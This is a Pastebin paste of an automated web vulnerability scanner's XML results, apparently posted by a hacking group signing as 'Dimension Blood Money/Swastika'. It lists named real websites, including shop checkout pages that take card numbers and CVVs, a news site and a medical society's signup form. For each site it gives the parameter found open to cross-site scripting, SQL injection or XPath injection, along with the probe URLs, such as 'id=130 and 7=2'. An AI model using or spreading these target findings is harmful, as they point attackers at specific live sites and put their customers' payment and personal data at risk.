  430. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002<>%3c%3e%253c%253e&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  431. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  432. </VulRow>
  433. - <VulRow>
  434. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  435. <Parameter>lastname</Parameter>
  436. <Type>POST</Type>
  437. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003<>%3c%3e%253c%253e&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  438. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  439. </VulRow>
  440. - <VulRow>
  441. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  442. <Parameter>email</Parameter>
  443. <Type>POST</Type>
  444. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004<>%3c%3e%253c%253e&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  445. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  446. </VulRow>
  447. - <VulRow>
  448. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  449. <Parameter>phone</Parameter>
  450. <Type>POST</Type>
  451. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005<>%3c%3e%253c%253e&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  452. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  453. </VulRow>
  454. - <VulRow>
  455. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  456. <Parameter>street1</Parameter>
  457. <Type>POST</Type>
  458. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006<>%3c%3e%253c%253e&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  459. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  460. </VulRow>
  461. - <VulRow>
  462. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  463. <Parameter>street2</Parameter>
  464. <Type>POST</Type>
  465. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007<>%3c%3e%253c%253e&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  466. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  467. </VulRow>
  468. - <VulRow>
  469. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  470. <Parameter>city</Parameter>
  471. <Type>POST</Type>
  472. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008<>%3c%3e%253c%253e&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  473. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  474. </VulRow>
  475. - <VulRow>
  476. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  477. <Parameter>county</Parameter>
  478. <Type>POST</Type>
  479. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009<>%3c%3e%253c%253e&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  480. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  481. </VulRow>
  482. - <VulRow>
  483. <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
  484. <Parameter>postcode</Parameter>
  485. <Type>POST</Type>
  486. <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010<>%3c%3e%253c%253e&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
  487. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  488. </VulRow>
  489. - <VulRow>
  490. <ReferURL>http://www.gottinta.com/ink-cartridges.php?printerbrand=brother</ReferURL>
  491. <Parameter>printerbrand</Parameter>
  492. <Type>GET</Type>
  493. <KWordActionURL>http://www.gottinta.com/ink-cartridges.php?printerbrand=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  494. <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
  495. </VulRow>
  496. - <VulRow>
  497. <ReferURL>http://www.gottinta.com/about-us.php</ReferURL>
  498. <Parameter>search_field</Parameter>
  499. <Type>POST</Type>
  500. <KWordActionURL>http://www.gottinta.com/search.php?nav=search^search_field=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  501. <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
  502. </VulRow>
  503. - <VulRow>
  504. <ReferURL>http://www.gottinta.com/printer-cartridges.php?printerbrand=Canon ImageRunner</ReferURL>
  505. <Parameter>printerbrand</Parameter>
  506. <Type>GET</Type>
  507. <KWordActionURL>http://www.gottinta.com/printer-cartridges.php?printerbrand=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  508. <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
  509. </VulRow>
  510. - <VulRow>
  511. <ReferURL>http://www.gottinta.com/ink-toner-cartridges.php?printer_id=CanonImageRunner1023IF</ReferURL>
  512. <Parameter>printer_id</Parameter>
  513. <Type>GET</Type>
  514. <KWordActionURL>http://www.gottinta.com/ink-toner-cartridges.php?printer_id=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
  515. <Vulnerability>Cross Site Scripting(URL)</Vulnerability>
  516. </VulRow>
  517. - <VulRow>
  518. <ReferURL>http://www.atthenet.co.uk/item_detail.php?Cat_ID=1^ID=16581</ReferURL>
  519. <Parameter>ID=16581</Parameter>
  520. <Type>Integer</Type>
  521. <KWordActionURL>waist</KWordActionURL>
  522. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  523. </VulRow>
  524. - <VulRow>
  525. <ReferURL>http://www.atthenet.co.uk/plussize.php?Cat_ID=1^Item_ID=1</ReferURL>
  526. <Parameter>Item_ID=1</Parameter>
  527. <Type>Integer</Type>
  528. <KWordActionURL>Between</KWordActionURL>
  529. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  530. </VulRow>
  531. - <VulRow>
  532. <ReferURL>http://www.andhraxpress.com/telugu.php?id=1933</ReferURL>
  533. <Parameter>id=1933</Parameter>
  534. <Type>Integer</Type>
  535. <KWordActionURL>Kajal</KWordActionURL>
  536. <Vulnerability>URL SQL INJECTION</Vulnerability>
  537. </VulRow>
  538. - <VulRow>
  539. <ReferURL>http://www.andhraxpress.com/telugu.php^id=1933</ReferURL>
  540. <Parameter>id=1933</Parameter>
  541. <Type>Integer</Type>
  542. <KWordActionURL>Kajal</KWordActionURL>
  543. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  544. </VulRow>
  545. - <VulRow>
  546. <ReferURL>http://www.andhraxpress.com/politicalnews.php?id=1701</ReferURL>
  547. <Parameter>id=1701</Parameter>
  548. <Type>Integer</Type>
  549. <KWordActionURL>sabha</KWordActionURL>
  550. <Vulnerability>URL SQL INJECTION</Vulnerability>
  551. </VulRow>
  552. - <VulRow>
  553. <ReferURL>http://www.andhraxpress.com/politicalnews.php^id=1701</ReferURL>
  554. <Parameter>id=1701</Parameter>
  555. <Type>Integer</Type>
  556. <KWordActionURL>sabha</KWordActionURL>
  557. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  558. </VulRow>
  559. - <VulRow>
  560. <ReferURL>http://www.andhraxpress.com/ap.php?id=6685^start=30</ReferURL>
  561. <Parameter>start=30</Parameter>
  562. <Type>Integer</Type>
  563. <KWordActionURL>fetch</KWordActionURL>
  564. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  565. </VulRow>
  566. - <VulRow>
  567. <ReferURL>http://www.andhraxpress.com/studio.php^id=21646</ReferURL>
  568. <Parameter>id=21646</Parameter>
  569. <Type>Integer</Type>
  570. <KWordActionURL>Chammak</KWordActionURL>
  571. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  572. </VulRow>
  573. - <VulRow>
  574. <ReferURL>http://www.andhraxpress.com/index.php^start3=60</ReferURL>
  575. <Parameter>start3=60</Parameter>
  576. <Type>Integer</Type>
  577. <KWordActionURL>Malabar</KWordActionURL>
  578. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  579. </VulRow>
  580. - <VulRow>
  581. <ReferURL>http://www.andhraxpress.com/songs.php^id=301</ReferURL>
  582. <Parameter>id=301</Parameter>
  583. <Type>Integer</Type>
  584. <KWordActionURL>March</KWordActionURL>
  585. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  586. </VulRow>
  587. - <VulRow>
  588. <ReferURL>http://www.andhraxpress.com/gossy.php^id=1498</ReferURL>
  589. <Parameter>id=1498</Parameter>
  590. <Type>Integer</Type>
  591. <KWordActionURL>younger</KWordActionURL>
  592. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  593. </VulRow>
  594. - <VulRow>
  595. <ReferURL>http://www.andhraxpress.com/gossy.php?id=13871\&start=99999999</ReferURL>
  596. <Parameter>start=99999999</Parameter>
  597. <Type>Integer</Type>
  598. <KWordActionURL>fetch</KWordActionURL>
  599. <Vulnerability>URL SQL INJECTION</Vulnerability>
  600. </VulRow>
  601. - <VulRow>
  602. <ReferURL>http://www.andhraxpress.com/film.php^id=130</ReferURL>
  603. <Parameter>id=130</Parameter>
  604. <Type>Integer</Type>
  605. <KWordActionURL>Vikram</KWordActionURL>
  606. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  607. </VulRow>
  608. - <VulRow>
  609. <ReferURL>http://www.andhraxpress.com/film.php?id=1498 and 7=7&start=0</ReferURL>
  610. <Parameter>start=0</Parameter>
  611. <Type>Integer</Type>
  612. <KWordActionURL>fetch</KWordActionURL>
  613. <Vulnerability>URL SQL INJECTION</Vulnerability>
  614. </VulRow>
  615. - <VulRow>
  616. <ReferURL>http://www.andhraxpress.com/gal.php^id=1572</ReferURL>
  617. <Parameter>id=1572</Parameter>
  618. <Type>Integer</Type>
  619. <KWordActionURL>October</KWordActionURL>
  620. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  621. </VulRow>
  622. - <VulRow>
  623. <ReferURL>http://www.andhraxpress.com/bolly.php^id=3468</ReferURL>
  624. <Parameter>id=3468</Parameter>
  625. <Type>Integer</Type>
  626. <KWordActionURL>Identify</KWordActionURL>
  627. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  628. </VulRow>
  629. - <VulRow>
  630. <ReferURL>http://www.andhraxpress.com/bolly.php?id=130 and 7=2^start=0</ReferURL>
  631. <Parameter>start=0</Parameter>
  632. <Type>Integer</Type>
  633. <KWordActionURL>Identify</KWordActionURL>
  634. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  635. </VulRow>
  636. - <VulRow>
  637. <ReferURL>http://www.andhraxpress.com/gal.php?id=130 and 7=2&start=99999999</ReferURL>
  638. <Parameter>start=99999999</Parameter>
  639. <Type>Integer</Type>
  640. <KWordActionURL>Nayanatara</KWordActionURL>
  641. <Vulnerability>URL SQL INJECTION</Vulnerability>
  642. </VulRow>
  643. - <VulRow>
  644. <ReferURL>http://www.andhraxpress.com/videosm.php^id=460</ReferURL>
  645. <Parameter>id=460</Parameter>
  646. <Type>Integer</Type>
  647. <KWordActionURL>Ramarajyam</KWordActionURL>
  648. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  649. </VulRow>
  650. - <VulRow>
  651. <ReferURL>http://www.andhraxpress.com/videosm.php?id=1572 and 7=2&start=0</ReferURL>
  652. <Parameter>start=0</Parameter>
  653. <Type>Integer</Type>
  654. <KWordActionURL>Tamanna</KWordActionURL>
  655. <Vulnerability>URL SQL INJECTION</Vulnerability>
  656. </VulRow>
  657. - <VulRow>
  658. <ReferURL>http://www.andhraxpress.com/studio.php?id=130 and 7=2&start=30</ReferURL>
  659. <Parameter>start=30</Parameter>
  660. <Type>Integer</Type>
  661. <KWordActionURL>fetch</KWordActionURL>
  662. <Vulnerability>URL SQL INJECTION</Vulnerability>
  663. </VulRow>
  664. - <VulRow>
  665. <ReferURL>http://www.andhraxpress.com/studio.php?id=130 and 7=2&start=99999999</ReferURL>
  666. <Parameter>start=99999999</Parameter>
  667. <Type>Integer</Type>
  668. <KWordActionURL>Prakash</KWordActionURL>
  669. <Vulnerability>URL SQL INJECTION</Vulnerability>
  670. </VulRow>
  671. - <VulRow>
  672. <ReferURL>http://www.andhraxpress.com/mv24.php?start=70&id=99999999</ReferURL>
  673. <Parameter>id=99999999</Parameter>
  674. <Type>String</Type>
  675. <KWordActionURL>Chammak</KWordActionURL>
  676. <Vulnerability>URL SQL INJECTION</Vulnerability>
  677. </VulRow>
  678. - <VulRow>
  679. <ReferURL>http://www.andhraxpress.com/mv24.php?id=130 and 7=2&start=70</ReferURL>
  680. <Parameter>start=70</Parameter>
  681. <Type>String</Type>
  682. <KWordActionURL>Urmila</KWordActionURL>
  683. <Vulnerability>URL SQL INJECTION</Vulnerability>
  684. </VulRow>
  685. - <VulRow>
  686. <ReferURL>https://www.atthenet.co.uk/checkout.php</ReferURL>
  687. <Parameter>billing_town=99999999</Parameter>
  688. <Type>String</Type>
  689. <KWordActionURL>https://www.atthenet.co.uk/checkout.php^billing_county=WCRTESTINPUT000005&billing_postcode=WCRTESTINPUT000006&billing_phone=WCRTESTINPUT000007&ship_name=WCRTESTINPUT000008&shipping_address1=WCRTESTINPUT000009&shipping_address2=WCRTESTINPUT000010&shipping_town=WCRTESTINPUT000011&shipping_county=WCRTESTINPUT000012&shipping_postcode=WCRTESTINPUT000013&shipping_phone=WCRTESTINPUT000014&usergroup=visitor&heard_from=Search Engine - Yahoo&billing_country=004&shipping_country=004&email_sign=WCRTESTINPUT000000&pass_sign=&bill_name=WCRTESTINPUT000001&billing_address1=WCRTESTINPUT000002&billing_address2=WCRTESTINPUT000003&billing_town=99999999</KWordActionURL>
  690. <Vulnerability>XPath INJECTION</Vulnerability>
  691. </VulRow>
  692. - <VulRow>
  693. <ReferURL>http://www.positive-proof.com/customapps/idprogram/app/v1/index.php^email=WCRTESTINPUT000000&token=WCRTESTINPUT000001&do=parent.login</ReferURL>
  694. <Parameter>do=parent.login</Parameter>
  695. <Type>String</Type>
  696. <KWordActionURL>Error</KWordActionURL>
  697. <Vulnerability>POST SQL INJECTION</Vulnerability>
  698. </VulRow>
  699. - <VulRow>
  700. <ReferURL>http://www.worldspinalcolumn.org/case.php^id=229</ReferURL>
  701. <Parameter>id=229</Parameter>
  702. <Type>Integer</Type>
  703. <KWordActionURL>WORLD</KWordActionURL>
  704. <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
  705. </VulRow>
  706. - <VulRow>
  707. <ReferURL>http://www.worldspinalcolumn.org/join_now.php?^passworde=WCRTESTINPUT000001&confirmpassword=WCRTESTINPUT000002&firstname=WCRTESTINPUT000003&lastname=WCRTESTINPUT000004&hospitalclinic=WCRTESTINPUT000005&address1=WCRTESTINPUT000006&city=WCRTESTINPUT000007&stateprovince=WCRTESTINPUT000008&postalcode=WCRTESTINPUT000009&phone=WCRTESTINPUT000010&fax=WCRTESTINPUT000011&mobile=WCRTESTINPUT000012&memberid=&memberstatus=deactive&registerip=109.169.70.134&joinus=Join Us&MM_insert=join&salutation=Dr.&country=1&email=WCRTESTINPUT000000</ReferURL>
  708. <Parameter>email=!S!WCRTESTINPUT000000!E!</Parameter>
  709. <Type>String</Type>
  710. <KWordActionURL>WORLD</KWordActionURL>
  711. <Vulnerability>POST SQL INJECTION</Vulnerability>
  712. </VulRow>
  713. - <VulRow>
  714. <ReferURL>http://www.worldspinalcolumn.org/join_now.php?^fax=WCRTESTINPUT000011&mobile=WCRTESTINPUT000012&memberid=&memberstatus=deactive&registerip=109.169.70.134&joinus=Join Us&MM_insert=join&salutation=Dr.&country=1&email=WCRTESTINPUT000000&passworde=WCRTESTINPUT000001&confirmpassword=WCRTESTINPUT000002&firstname=WCRTESTINPUT000003&lastname=WCRTESTINPUT000004&hospitalclinic=WCRTESTINPUT000005&address1=WCRTESTINPUT000006&city=WCRTESTINPUT000007&stateprovince=WCRTESTINPUT000008&postalcode=WCRTESTINPUT000009&phone=1</ReferURL>
  715. <Parameter>phone=1</Parameter>
  716. <Type>String</Type>
  717. <KWordActionURL>WORLD</KWordActionURL>
  718. <Vulnerability>POST SQL INJECTION</Vulnerability>
  719. </VulRow>
  720. </SiteVulList>
  721. </ROOT>
  722.  
  723. ==============================
  724. Dimension Blood Money/Swastika
  725. ==============================
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!